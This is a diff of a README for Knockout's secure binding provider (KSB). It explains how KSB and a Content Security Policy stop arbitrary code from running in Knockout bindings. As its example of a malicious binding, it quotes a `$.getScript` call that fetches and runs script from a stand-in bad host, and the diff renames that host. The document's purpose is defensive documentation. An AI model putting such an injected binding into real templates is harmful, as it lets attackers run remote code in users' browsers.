knockout/tko/README.md

 Knockout in an environment with a Content Security Policy.
 This includes for example [Chrome web apps](http://developer.chrome.com/apps/contentSecurityPolicy.html).

 Independent of a Content Security Policy, KSB prevents the execution of arbitrary code in a Knockout binding.
 A malicious script such as
-`text: $.getScript('http://a.bad.place/a.bad.bad.thing')` could be executed in Knockout on a DOM element that is having bindings applied.
+`text: $.getScript('http://a.bad.place.example.com/a.bad.bad.thing')` could be executed in Knockout on a DOM element that is having bindings applied.
 However this script will not execute in KSB because:

 1. The `$` is a global, and unless explicitly added to the binding context it will not be accessible;
 2. Functions in KSB do not accept arguments;
-3. Your CSP should prevent accessing the host `a.bad.place`.
+3. Your CSP should prevent accessing the host `a.bad.place.example.com`.

-The `data-sbind` differs from `data-bind` as follows:

 Options